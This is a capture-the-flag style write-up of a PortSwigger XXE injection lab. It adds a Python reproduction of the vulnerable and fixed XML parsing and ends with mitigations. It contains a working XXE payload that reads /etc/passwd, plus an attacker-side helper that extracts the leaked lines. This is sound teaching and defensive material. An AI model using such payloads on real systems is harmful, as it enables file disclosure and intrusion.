XXE Injection — PortSwigger Lab 1
Accessing the lab, we get the landing page of the shop.
Clicking on any product to view its details, we find the check stock functionality at the end of the product description.
Clicking on check stock returns the amount of stock for that product in the selected store.
Analyzing the request in Burp Suite, we see that the stock check is a POST whose body is XML rather than form data or JSON.
Sending the request to Burp Repeater, we add a DTD (Document Type Definition) to the body that declares an external entity named
pwn whose value is read from the file /etc/passwd, and we reference that entity inside the product id tags in place of the numeric ID.
<!DOCTYPE abc [ <!ENTITY pwn SYSTEM "file:///etc/passwd"> ]>
<productId>&pwn;</productId>
Sending the request, we get a bad request error, because the expanded entity is not a valid product ID, but the error response echoes the rejected value, so it contains the contents of /etc/passwd and the lab is solved.
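To make clear what the server-side parser is doing when it expands &pwn;, and what the fix looks like, the following is an added example, not code from the lab or from this write-up. It reproduces the vulnerable parse with Python's standard xml.sax (which resolves external general entities only when feature_external_ges is switched on) beside the fixed parse, and includes a small attacker-side helper that pulls passwd-format lines out of the error response. The element names stockCheck/productId/storeId, the "Invalid product ID:" error text, and the temporary passwd-style file are constructed stand-ins, not taken from the page.

```python
import io
import pathlib
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for /etc/passwd so the script never reads the real file.
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "carlos:x:1001:1001::/home/carlos:/bin/sh\n"
)


def write_fake_passwd():
    """Write the constructed passwd file to a temp path and return that path."""
    tmp = tempfile.NamedTemporaryFile("w", suffix=".passwd", delete=False)
    with tmp:
        tmp.write(FAKE_PASSWD)
    return pathlib.Path(tmp.name)


def stock_check_body(product_id):
    """A normal check-stock body (element names are an assumption, not from the page)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f"<stockCheck><productId>{product_id}</productId><storeId>1</storeId></stockCheck>"
    ).encode()


def xxe_payload(file_url):
    """The write-up's payload: declare pwn as an external SYSTEM entity and
    reference it where the numeric product ID is expected."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE abc [ <!ENTITY pwn SYSTEM "{file_url}"> ]>'
        "<stockCheck><productId>&pwn;</productId><storeId>1</storeId></stockCheck>"
    ).encode()


class _StockCheckHandler(ContentHandler):
    """Collects the character data of productId and storeId."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name in ("productId", "storeId"):
            self._current = name
            self.fields[name] = ""

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        if name == self._current:
            self._current = None


def check_stock(body, resolve_external_entities):
    """Stand-in for the lab's endpoint; returns (status, response text).

    resolve_external_entities=True reproduces the vulnerable configuration;
    False is the fix (and xml.sax's default since Python 3.7.1)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _StockCheckHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body))
    product_id = handler.fields.get("productId", "")
    if not product_id.strip().isdigit():
        # Echoing the rejected value is the leak channel: whatever &pwn;
        # expanded to ends up in the 400 response. (Constructed message.)
        return 400, "Invalid product ID: " + product_id
    return 200, "42 units in stock"


# One passwd record: name:passwd:uid:gid:gecos:home:shell (no ^ anchor, because the
# first leaked line is glued to the error prefix on the same line).
PASSWD_LINE = re.compile(r"[^:\s]+:[^:\s]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M)


def leaked_passwd_lines(response_text):
    """Attacker side: pull passwd-format lines out of the error response."""
    return PASSWD_LINE.findall(response_text)


if __name__ == "__main__":
    passwd_path = write_fake_passwd()
    payload = xxe_payload(passwd_path.as_uri())
    for resolve in (True, False):
        status, text = check_stock(payload, resolve)
        print(f"external entities {'ON ' if resolve else 'OFF'}: HTTP {status}: {text!r}")
        print("  leaked:", leaked_passwd_lines(text))
    passwd_path.unlink()
```

With external entities on, the 400 response carries both constructed passwd lines; with them off, the productId expands to nothing and the same request yields an empty "Invalid product ID:" error. The fix is always at the parser, not in the input validation that produced the 400: disable DTD processing or external entity resolution (xml.sax's feature_external_ges off, lxml's XMLParser(resolve_entities=False), Java's disallow-doctype-decl feature).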